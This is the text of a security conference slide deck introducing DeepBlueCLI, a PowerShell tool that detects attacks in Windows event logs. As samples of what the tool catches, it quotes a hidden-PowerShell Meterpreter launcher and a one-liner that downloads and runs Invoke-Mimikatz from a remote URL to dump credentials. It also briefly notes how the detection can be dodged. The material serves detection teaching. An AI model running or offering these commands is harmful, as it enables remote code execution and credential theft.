Você está na página 1de 45



Introducing DeepBlueCLI
a PowerShell Module for Hunt
Teaming via Windows Event Logs

Eric Conrad (GSE #13)


• A copy of this talk is available

at htttp://ericconrad.com
• Includes a link to the
DeepBlueCLI GitHub site
o https://github.com/sans-blue-
o Plus sample evtx files for all
major events discussed

Introducing DeepBlueCLI 2
Sunlight is the Best Disinfectant – Louis Brandeis

• Malware and exploit frameworks have been evolving faster than

common preventive technologies have kept up
o Detective controls allow more aggressive checks
• By default Metasploit creates random service names like this:
o Service Name: GWRhKCtKcmQarQUS
o Service name matches: ^[A-Za-z]{16}$
• Blocking 16 character service names containing only upper and
lower alpha characters could lead to false positives
• This is how you fight, and this is how you win:
o Automatically detect these names, married with rapid incident response
Introducing DeepBlueCLI 3
The Evolution of Windows Malware Payloads

Malware and exploit frameworks often copy an exe to the filesystem

• Often in c:\windows\system32\RanDOmNAme.exe
• Metasploit exploit target: Native upload
• Corporate malware defenses are designed to prevent this
Newer Malware and exploitation frameworks are migrating to
PowerShell for post exploitation
• They avoid using .ps1 files, and load the code via (very long) command
lines, or use the PowerShell WebClient.DownloadString Method
• Metasploit exploit target Powershell uses a long compressed and base64-
encoded PowerShell function loaded via cmd.exe

Introducing DeepBlueCLI 4
Metasploit Meterpreter Payload via Command Line
C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq
System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object
(New-Object IO.StreamReader(New-Object

Introducing DeepBlueCLI 5

• Command is > 2400 bytes

• powershell.exe launched via cmd.exe
• Hidden PowerShell window
• gzip compressed and Base64 encoded PowerShell
o To analyze: decode base64, and then decompress with gzip
o Result: obfuscated PowerShell function

Introducing DeepBlueCLI 6
Obfuscated PowerShell Function (after base64 -d and gzip -d)

Introducing DeepBlueCLI 7
Payload via Net.WebClient

Executing PowerSploit's Invoke-Mimikatz.ps1 via

• C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe "IEX
Invoke-Mimikatz -DumpCreds"

Same method via short URL:

• C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe "IEX
(New-Object Net.WebClient).DownloadString('http://eic.me/17');
Invoke-Mimikatz -DumpCreds"
• Note that 'ps1' is not included in the command line

Introducing DeepBlueCLI 8
Advantages to these Methods

• Antivirus will allow cmd.exe and powershell.exe to execute

• There are no files saved to the disk to scan
• If the system is using application whitelisting: cmd.exe and
powershell.exe will be whitelisted
• Restricting execution of ps1 files via Set-ExecutionPolicy settings has
no effect
o "Set-ExecutionPolicy is not a Security Control" - @Ben0xA, yesterday
• There is no logging of process command lines or PowerShell commands by
default (hold that thought)
• Preventive and detective controls tend to allow and ignore these methods

Introducing DeepBlueCLI 9
Windows 7

• Windows 10 offers a wealth of security features

o Upgrade if you can
• This talk will focus on detecting malicious events on
Windows 7
o Windows 7 offers a "sweet spot" for clients
• All recommendations can be achieved with a Windows 7,
free Microsoft downloads, plus DeepBlueCLI
o All of these events (and more) can also be detected on Windows 8+

Introducing DeepBlueCLI 10
Log Full Command Line of all Processes

• Windows 7+ now supports logging full command line of all

launched processes natively
• Turn this on!
• Run gpedit.msc and set:
o Computer Configuration\Windows Settings\Security Settings\Advanced
Audit Policy Configuration\System Audit Policies\Detailed Tracking
o Computer Configuration\Administrative Templates\System\Audit
Process Creation
• Then monitor:
o PS> Get-WinEvent -FilterHashtable @{Logname="Security"; ID=4688}

Introducing DeepBlueCLI 11
Security Event 4688

• Security event 4688 is the highest value Windows event, IMO

o It can be used to reliably detect most modern post exploitation techniques
• There is one caveat: passwords may be disclosed via this event

Introducing DeepBlueCLI 12
Command Lines to Look For

Once logging full command lines: search for the following:

• Loooooooooong commands (1,000+ bytes)
• csc.exe (C# compiler)
• cvtres.exe (Resource File To COFF Object Conversion Utility)
• rundll32.exe and cscript.exe
• .vbs scripts
• schtasks and at
• Anything launched from a temp folder
• Launching PowerShell via cmd.exe
• Base64 encoded commands
Introducing DeepBlueCLI 13
PowerShell Logging

PowerShell 4.o (default on PowerShell 5.0 (default on Windows 10)

Windows 8.1) includes additional adds more logging

• Can be installed on Windows 7 SP1,

• Easy Windows 7 SP1 install takes multiple steps
• Event 4103 (Module Logging) • PowerShell v5 works on Windows 7SP1,
is very helpful but…
• DeepBlueCLI analyzes this o It's easy to break PowerShell logging
Introducing DeepBlueCLI 14

• Microsoft's EMET (Enhanced Mitigation Experience Toolkit) is a tool that

hardens Windows operating systems against a series of common exploit
o Free download from Microsoft
• Can be used to harden any version of Windows from XP and 2003 through
Windows 10 and Server 2012
o Older EMET versions are helpful for helping protect legacy operating systems such as
Windows XP and Windows Server 2003 (both end of life)
• In my testing: Windows 7 becomes a much harder target once EMET is
• One thing I can recommend is anti-exploitation features. Microsoft EMET:
everybody ought to be turning that on – Rob Joyce, NSA
Introducing DeepBlueCLI 15

Detect when EMET blocks Malware:

• PS> Get-WinEvent -FilterHashtable
@{LogName="application"; ProviderName="EMET"; id=2}

Introducing DeepBlueCLI 16
Introducing DeepBlueCLI – Beta 0.1

• Announcing the public release of DeepBlueCLI beta 0.1

• 100% PowerShell, runs on PowerShell 2.0 (Windows 7
default) or higher
o Can process PowerShell 4.0/5.0 event logs
• Can automatically detect all examples discussed
o And more
• Processes local event logs, or evtx files

Introducing DeepBlueCLI 17
The Genesis of DeepBlueCLI

• Logging new process creation: easy

PS> Get-WinEvent -FilterHashtable @{Logname="Security"; ID=4688}

• Logging processes launched with long command lines,

or commands that match certain malicious patterns:
requires scripting
• Telling clients "just write a script" usually results in
blank stares
o My keen powers of inference tell me that SOC scripters are rare
o OK, let me write the script…
Introducing DeepBlueCLI 18
The Script

• How hard could it be?

o Famous last words as you confidently submit a
DerbyCon CFP
• Some event data is well-formed and easily
parsed XML
• Other event data (*cough*, EMET, *cough*) is
a blob of text
o Fortunately, PowerShell has strong regex support
• In the end, each event requires custom code to:
o Detect malice
o Generate concise, actionable output

Introducing DeepBlueCLI 19
DeepBlueCLI – Design Notes

• Focus is on quality, not quantity

o All killer, no filler
o Not "shovel events into/out of a tool"
• Each reported event type has a specific malicious use case to
support it
• Initial tool focus is on high quality, actionable events, and the
underlying logic to detect them
• Output is currently basic text, but designed to be actionable
o Plan to add csv, xml and PowerShell object output modes in the future

Introducing DeepBlueCLI 20
Dodging DeepBlueCLI

• Many of the techniques used by DeepBlueCLI can be evaded

o DeepBlueCLI identifies commands containing 'mimikatz'
o Dodge by renaming 'mimikatz' to 'mimidogz'

• Dodging all of the techniques is difficult

o Long command lines
o Use of Net.WebClient
o base64-encoded functions
o Compressed functions
• Many IT professionals commit the
perfect solution fallacy

Introducing DeepBlueCLI 21
Beware of the Perfect Attacker Fallacy

Paraphrasing collective feedback To quote Grace Hopper:

from my change-resistant clients: • The most damaging
• Well, APT will certainly use zero- phrase in the language
day exploits to bypass patching, is “We’ve always done
and also bypass EMET without it this way!”
triggering any EMET logs, and • Humans are allergic
inject malware into RAM to to change. They love to
avoid whitelisting, and create say, "We've always
realistic-looking registry run done it this way." I try
keys to maintain persistence, and to fight that. That's
phone home quite infrequently why I have a clock on
via Facebook to evade command- my wall that runs
and-control detection, and use counter-clockwise.1
perfect user-agents, and…

Introducing DeepBlueCLI 22
DeepBlueCLI: Current List of Detected Events

• Long command lines • EMET Blocks

• Long PowerShell commands • Applocker Blocks
• Regex matching PowerShell • Suspicious service creation
and CL • Service errors
• Base64 encoded CL or • User creation
• Users added to Local/Global
• Compressed/Base64 encoded Admin group
CL or Powershell
• High number of logon failures
• PowerShell Net.WebClient

Introducing DeepBlueCLI 23
DeepBlueCLI: Regex Matching Command Lines

Regular expression matching PowerShell and command

lines via simple CSV file

Introducing DeepBlueCLI 24
DeepBlueCLI - Whitelist

Some benign commands create giant command lines, for example:

"C:\Program Files\Google\Update\GoogleUpdate.exe" /ping

DeepBlueCLI supports a whitelist to ignore these commands

Introducing DeepBlueCLI 25
DeepBlue CLI: Base64 and/or Compressed Commands

• DeepBlueCLI attempts to automatically detect base64-

encoded commands
o And automatically decode them
• If the commands are also compressed (Metasploit-style)
it will also uncompress them
• In both cases: it will then scan the normalized command
for malicious regular expression matches

Introducing DeepBlueCLI 26
Use Case: DeepBlueCLI vs. SMB Password Guessing

This Metasploit SMB password guessing attack generates

3561 security event logs

DeepBlueCLI creates one entry

• Design goal: summarize, don't DoS
Introducing DeepBlueCLI 27
Use Case: PowerShell Empire (thx @harmj0y and @enigma0x3)

• PowerShell Empire is quite

• By default: zero Windows
events are generated by the
launcher.bat payload on the
• Once enabled: security
event 4688 is quite helpful

Introducing DeepBlueCLI 28
DeepBlueCLI vs. PowerShell Empire


Introducing DeepBlueCLI 29
Use Case: Metasploit psexec

Exploit target: Native


Introducing DeepBlueCLI 30
Meterpreter getsystem

Attacker then escalated privileges and dumped the hashes:

Introducing DeepBlueCLI 31
DeepBlueCLI vs. Metasploit psexec with Native upload

Detection of Metasploit-style service name and Native

upload EXE:

DeepBlueCLI also detects use of Meterpreter's "getsystem":

Introducing DeepBlueCLI 32
Use Case: Metasploit psexec, exploit target PowerShell

Introducing DeepBlueCLI 33
DeepBlueCLI vs Metasploit psexec – exploit target PowerShell, system log

Introducing DeepBlueCLI 34
DeepBlueCLI vs Metasploit psexec – exploit target PowerShell, security log

Introducing DeepBlueCLI 35
Use Case: PowerSploit (thx @mattifestation, @obscuresec and

Introducing DeepBlueCLI 36
DeepBlueCLI vs PowerSploit

First command used short URL, second used PowerSploit's

GitHub site

Introducing DeepBlueCLI 37
Use Case: PSAttack (thx @jaredhaight)

PSAttack "…doesn't rely on

powershell.exe. Instead it calls
powershell directly through
the .NET framework. This
makes it harder for
enterprises to block."
• https://github.com/jaredhaight

Introducing DeepBlueCLI 38
DeepBlueCLI vs. PSAttack

DeepBlueCLI detects PSAttack's use of csc.exe (C#

Compiler) and cvtres.exe (Resource File To COFF
Object Conversion Utility)

Introducing DeepBlueCLI 39
Use Case: Invoke-Obfuscation (thx @danielhbohannon)

Introducing DeepBlueCLI 40
DeepBlueCLI vs. Invoke-Obfuscation

• Invoke-Obfuscation will be released tomorrow:

• In the meantime, I noticed it used a lot of special characters,

o Specifically the "+" to join the obfuscated strings together
• So I updated DeepBlueCLI
• And I created a POC "exploit"…
Introducing DeepBlueCLI 41
DeepBlueCLI vs. Invoke-Obfuscation

• Invoke-Obfuscation will be released tomorrow. In the meantime,

I created a POC

Introducing DeepBlueCLI 42
DeepBlueCLI: Next Steps

• Next major update will split DeepBlueCLI into two parts:

• Detection engine:
o Outputting to XML or PowerShell Object format
• Reporting engine:
o Inputs results from detection engine
o Output text, XML or CSV
• Also plans to integrate into SOF-ELK

Introducing DeepBlueCLI 43
Demo Time!

Introducing DeepBlueCLI 44
Thank you!

• Contact me on Twitter:
o @eric_conrad
• Copy of this talk is available
at http://ericconrad.com
• Check out Security 511 for
more monitoring/operational
goodness: http://sec511.com

Introducing DeepBlueCLI 45